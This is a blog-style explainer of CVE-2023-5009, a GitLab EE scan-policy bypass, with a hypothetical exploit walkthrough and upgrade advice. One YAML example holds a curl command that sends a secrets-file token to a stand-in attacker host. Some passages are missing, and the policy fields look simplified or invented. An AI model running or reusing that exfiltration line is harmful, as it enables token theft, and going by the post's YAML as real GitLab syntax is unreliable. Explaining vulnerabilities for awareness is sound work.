CVE CyberSecurity Database News

CVE-2023-5009 - Breaking Down the GitLab EE Security Policy Bypass (with Exploit Walkthrough)

Poster -

Published: 2024-06-20
*by SecurityResearcherJoe*

What is CVE-2023-5009?

CVE-2023-5009 is a critical vulnerability discovered in GitLab Enterprise Edition (EE) that lets attackers run pipeline jobs as any arbitrary user by abusing scheduled security scan policies. This issue affects all versions:

From 16.3 up to, but not including, 16.3.4

This vulnerability is particularly dangerous because it bypasses earlier attempted fixes for CVE-2023-3932 — highlighting how defense-in-depth sometimes falls flat in practice.

What Actually Happened

GitLab lets you set scan execution policies to schedule security scans on your projects. Some “owner” permissions are typically required for configurations. However, in the affected versions, an attacker could:

This allows attackers to steal secrets, move laterally, and escalate privileges.

> Why is this scary?
> Because code, secrets, tokens, and production creds are all at stake–pipeline jobs often have high privileges!

The Logic Flaw

The GitLab code responsible for *scheduled security scan policies* didn’t properly check the user context under which jobs were being run. A clever attacker could *impersonate arbitrary users* just by manipulating policy schedule configurations.

Let’s look at a conceptual example (simplified)

# scan-policy.yml
scan_execution_policy:
  name: "weekly-secrets-scan"
  description: "Run as a specific user, but attacker can modify"
  enabled: true
  schedule:
    active: true
    cadence: " 2 * * *"
    user: "victim_username"    # <--- Attacker injects their victim here!
    actions:
      - scan:
          scan: secret_detection

> 📌 Notice: “user” is user-controlled in some configs. If checks are missing, an attacker could specify *any* username.

Let’s walk through a hypothetical exploit scenario

#### 1. Attacker Has Project Owner/Maintainer on a Repo

Say Alice and Bob are on the same GitLab instance. Alice is a threat actor.

Alice crafts a security scan execution policy like this

scan_execution_policy:
  name: "malicious-backdoor"
  description: "Malicious scan running as Bob"
  enabled: true
  schedule:
    active: true
    cadence: "*/5 * * * *"
    user: "bob"  # <--- Choosing Bob to run the scan
    actions:
      - scan:
          scan: secret_detection
          script: "curl https://attacker-site/log?token=$(cat /run/secrets/api-token)"

3. Pipeline Executes as Bob, Not Alice

The GitLab runner schedules the scan, but instead of using Alice’s context, it impersonates Bob and pulls his tokens & secrets into the attacker’s control.

- Official GitLab Advisory for CVE-2023-5009
- Vulners: CVE-2023-5009
- Previous related CVE-2023-3932
- NVD Entry: CVE-2023-5009

16.3.4

> 🛑 If you’re running an affected version, upgrade immediately**.
> Do NOT delay, as this is easily abused and PoCs are trivial to re-create.

Final Takeaway

CVE-2023-5009 is a wake-up call about the importance of validating user-supplied parameters in automation systems like CI/CD. Just because you fixed one bug (*CVE-2023-3932*) doesn’t mean there aren’t others lurking nearby.

— SecurityResearcherJoe

*Original, exclusive content for your security awareness. Share and help spread the word about CVE-2023-5009.*

Timeline

Published on: 09/19/2023 08:16:00 UTC
Last modified on: 09/21/2023 18:44:00 UTC